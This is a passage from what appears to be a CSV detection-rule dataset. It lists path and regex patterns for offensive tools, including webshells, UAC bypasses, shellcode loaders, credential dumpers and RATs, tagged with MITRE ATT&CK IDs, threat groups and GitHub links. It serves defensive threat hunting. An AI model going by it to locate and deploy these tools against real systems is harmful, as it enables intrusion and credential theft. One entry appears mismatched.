"*/SigLoader/*",".{0,1000}\/SigLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11253"
"*/SigmaPotato.git*",".{0,1000}\/SigmaPotato\.git.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","11254"
"*/SigmaPotato/releases/download/*",".{0,1000}\/SigmaPotato\/releases\/download\/.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","11255"
"*/signer-exe.py*",".{0,1000}\/signer\-exe\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","11256"
"*/SignToolEx.cpp*",".{0,1000}\/SignToolEx\.cpp.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","11257"
"*/SignToolEx.git*",".{0,1000}\/SignToolEx\.git.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","11258"
"*/SignToolEx.sln*",".{0,1000}\/SignToolEx\.sln.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","11259"
"*/sigthief.py*",".{0,1000}\/sigthief\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","11260"
"*/SilentClean.exe*",".{0,1000}\/SilentClean\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","11261"
"*/SilentClean/SilentClean/*.cs*",".{0,1000}\/SilentClean\/SilentClean\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","11262"
"*/SilentCryptoMiner/*",".{0,1000}\/SilentCryptoMiner\/.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","11263"
"*/silentdump.c*",".{0,1000}\/silentdump\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","11264"
"*/silentdump.h*",".{0,1000}\/silentdump\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","11265"
"*/SilentHound.git*",".{0,1000}\/SilentHound\.git.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","11266"
"*/SilentMoonwalk.git*",".{0,1000}\/SilentMoonwalk\.git.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","11267"
"*/silentprocessexit.py*",".{0,1000}\/silentprocessexit\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","11268"
"*/silenttrinity/*.py*",".{0,1000}\/silenttrinity\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","11269"
"*/silic webshell.jsp*",".{0,1000}\/silic\swebshell\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11270"
"*/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php*",".{0,1000}\/SimAttacker\s\-\sVrsion\s1\.0\.0\s\-\spriv8\s4\sMy\sfriend\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11271"
"*/simple_hijacker/*",".{0,1000}\/simple_hijacker\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","11272"
"*/simple-backdoor.php*",".{0,1000}\/simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","","","11273"
"*/simple-backdoor.php*",".{0,1000}\/simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11274"
"*/SimpleLoader.cpp*",".{0,1000}\/SimpleLoader\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","11276"
"*/SimpleLoader.exe*",".{0,1000}\/SimpleLoader\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","11277"
"*/SimpleNTSyscallFuzzer.git*",".{0,1000}\/SimpleNTSyscallFuzzer\.git.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005  - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","11278"
"*/Simple-Reverse-Shell*",".{0,1000}\/Simple\-Reverse\-Shell.{0,1000}","offensive_tool_keyword","Simple-Reverse-Shell","Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication","T1548 - T1562 - T1027","TA0003 - TA0008","N/A","N/A","C2","https://github.com/tihanyin/Simple-Reverse-Shell/","1","1","N/A","N/A","N/A","10","119","30","2021-12-21T15:51:48Z","2021-12-19T22:16:32Z","11279"
"*/SimplyEmail.git*",".{0,1000}\/SimplyEmail\.git.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","N/A","5","10","953","228","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z","11280"
"*/SimShell 1.0 - Simorgh Security MGZ.php*",".{0,1000}\/SimShell\s1\.0\s\-\sSimorgh\sSecurity\sMGZ\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11281"
"*/SingleDose.git*",".{0,1000}\/SingleDose\.git.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","11282"
"*/S-inject.exe*",".{0,1000}\/S\-inject\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","11283"
"*/S-inject.git*",".{0,1000}\/S\-inject\.git.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","11284"
"*/S-inject_x64.exe*",".{0,1000}\/S\-inject_x64\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","11285"
"*/S-inject_x86.exe*",".{0,1000}\/S\-inject_x86\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","11286"
"*/sip-brute.nse*",".{0,1000}\/sip\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11287"
"*/sip-call-spoof.nse*",".{0,1000}\/sip\-call\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11288"
"*/sip-enum-users.nse*",".{0,1000}\/sip\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11289"
"*/sip-methods.nse*",".{0,1000}\/sip\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11290"
"*/sipvicious.py*",".{0,1000}\/sipvicious\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","11291"
"*/Sirep_Command_Payload.bt*",".{0,1000}\/Sirep_Command_Payload\.bt.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","11292"
"*/SirepRAT.git*",".{0,1000}\/SirepRAT\.git.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","11293"
"*/SirepRAT.py*",".{0,1000}\/SirepRAT\.py.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","11294"
"*/SirepRAT/releases/*",".{0,1000}\/SirepRAT\/releases\/.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","11295"
"*/sish.git*",".{0,1000}\/sish\.git.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11298"
"*/sish/keys*",".{0,1000}\/sish\/keys.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#linux","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11302"
"*/sish/pubkeys*",".{0,1000}\/sish\/pubkeys.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#linux","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11303"
"*/sish/releases/download/*",".{0,1000}\/sish\/releases\/download\/.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11304"
"*/sish/ssl*",".{0,1000}\/sish\/ssl.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#linux","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11305"
"*/sish:latest*",".{0,1000}\/sish\:latest.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11306"
